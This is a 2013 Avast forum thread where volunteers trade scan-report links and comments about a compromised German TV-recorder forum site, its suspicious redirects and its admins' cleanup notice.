Author Topic: Heavily infected site which is not blocked by Avast  (Read 6884 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Heavily infected site which is not blocked by Avast
« Reply #15 on: October 09, 2013, 12:50:44 AM »
One of the tasks of System Attendant's is being blocked.
This can be caused by a variety of problems.
Check for other alerts that will provide a clearer idea of the problem,
such as failures in Mail Flow or MAPI logon or failure of database maintenance to run.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline mchain

  • Avast Evangelist
  • Ultra Poster
  • ***
  • Posts: 5719
  • Spartan Warrior
Re: Heavily infected site which is not blocked by Avast
« Reply #16 on: October 10, 2013, 10:48:32 PM »
Seems some progress is being made at this site:
http://urlquery.net/report.php?id=6574369
http://zulu.zscaler.com/submission/show/db1b0a88ea586dd860afd12643412b88-1381436626

Also an apparent redirect in place by site admins here:  http://www.onlinetvrecorder.com/v2/?go=forumwarning  German version only.  Use Google Translate for English or other.

Multiple blacklisted sites on this one IP address alone:  http://www.urlvoid.com/ip/217.70.184.38
Windows 11 Home 23H2
Windows 11 Pro 23H2
Avast Premier Security version 24.8.6127 (build 24.8.9372.868)
UI version 1.0.814

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Heavily infected site which is not blocked by Avast
« Reply #17 on: October 10, 2013, 11:45:05 PM »
Well there is still excessive information spread from the site: System Details:
Running on: Varnish
Powered by: PHP/5.3.2-1ubuntu4.18
Via proxy: 1.1
/ad.adnet.de/adc.php?s=23643;wxh=728x90 - further links see: http://www.ranks.nl/cgi-bin/ranksnl/tools/checklink.cgi?uri=www.otrforum.com
broken links and redirects.
Only scanner to flag this site as suspicious among the major website scanners is Comodo Siteinspector on VT, but the actual scan is all green now:
http://app.webinspector.com/public/reports/17728037
Quttera's still flags the conditional redirect: index
Severity: Suspicious
Reason: Detected suspicious redirection to external web resources at HTTP level.
Details: Detected HTTP redirection to http://www.onlinetvrecorder.com/v2/?go=forumwarning.
File size[byte]: 4294967295
File type: Unknown
MD5: 00000000000000000000000000000000
Scan duration[sec]: 0.001000

This suspicious file flag denotes, mchain,  that they are "not out of the woods" yet at that site, well I mean this security wise...
This file is being flagged by Quttera as it is found a  top-level-document at HTTP level, and as such this is very dangerous practice,
because that way  it grants the script maximum  permissions allowed to control the web page in the browser (by malcreants).
This insecurity could lead to serious security and privacy breaches!

polonus
« Last Edit: October 11, 2013, 12:44:38 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline mchain

  • Avast Evangelist
  • Ultra Poster
  • ***
  • Posts: 5719
  • Spartan Warrior
Re: Heavily infected site which is not blocked by Avast
« Reply #18 on: October 11, 2013, 12:20:58 AM »
Pol,

Never said 'out of the woods'.   ;)    This sort of mess is going to take awhile to clean up.

As you say, seems their situation is due to lax or simply bad security practices, and so was a relatively easy target for a hacker(s).  That this is so bad we're talking privacy and security breaches in one breath, and it is really a shame as the common user really does not think about these or such issues before they visit.

It is only a matter of time before lax policy enforcement will come and bite you! 

Some sys admins do not know what they are doing, and they (may) never will.  Hard lesson to learn; this is always bad for innocent site visitors.
Windows 11 Home 23H2
Windows 11 Pro 23H2
Avast Premier Security version 24.8.6127 (build 24.8.9372.868)
UI version 1.0.814

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: Heavily infected site which is not blocked by Avast
« Reply #19 on: October 11, 2013, 12:40:17 AM »
Yep, mchain, fully agree there.

That is why I cannot understand that some will criticize Quttera and say they won't trust their scans (even here in the forums).
That is totally wrong and proof that they do not understand what a gold mine the Quttera scan results can be for the security apt  website admin
that knows about bad and/or insecure coding practices like modifiers, scripts in top level documents in HTTP, unchecked (eval) for dynamic content, etc. etc. etc.

I worked myself  through all the appropriate SANS reader pdf documents info on the subject, for instance the "Innocent Code" one is a must top read and then wrote all relevant info down for myself in one of my writing books as that is the way for me at least  to get familiar with these malcode hick-ups and learn them by heart so to spot them out at once as they come by. So my forehead start to wrinkle now at every |%3C I come accross. Else my Malware Script Detector extension will alarm when I feed part of some malcode into my search engine of choice.

But not knowing a thing about all this and keeping websites up that come to grossly endanger innocent and unaware users and actually could be considered as putting the data of website visitors at risk.

Good avast! provides us with the Shields and the detection rate goes up and up.

polonus


P.S. Seems there is some insight coming at the site as they take this seriously. Good, that is why we do it. They give users the advice not to visit the site as
they are trying to solve the problems. The message is in German, it goes like this:

Quote
Sehr geehrter Nutzer des OTR-Forums (www.otrforum.com)

Es gibt derzeit technische Probleme, daher können wir Ihnen zum Erfahrungsaustausch derzeit nur den Support-Chat anbieten.
Wir hoffen, dass wir das Problem innerhalb dieser Woche lösen können.

Damian
« Last Edit: October 11, 2013, 01:01:38 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!